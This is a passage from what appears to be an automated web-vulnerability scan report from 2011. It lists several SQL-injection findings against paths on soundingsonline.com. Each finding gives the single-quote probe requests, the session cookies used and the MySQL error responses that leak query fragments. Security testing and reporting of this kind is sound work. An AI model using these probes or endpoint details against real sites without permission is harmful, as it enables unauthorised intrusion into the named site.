Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.59. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/bay-tripper?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/bay-tripper?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.60. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/books?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/books?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.61. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/new-england-fishing?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/new-england-fishing?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.62. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/under-way?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/under-way?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.63. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component'/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component''/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.64. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact'/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact''/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.65. http://www.soundingsonline.com/component/chronocontact/ [chronoformname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact/?chronoformname=PSPage' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/chronocontact/?chronoformname=PSPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?chronoformname=PSPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.66. http://www.soundingsonline.com/component/chronocontact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact/?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.67. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content'/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content''/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
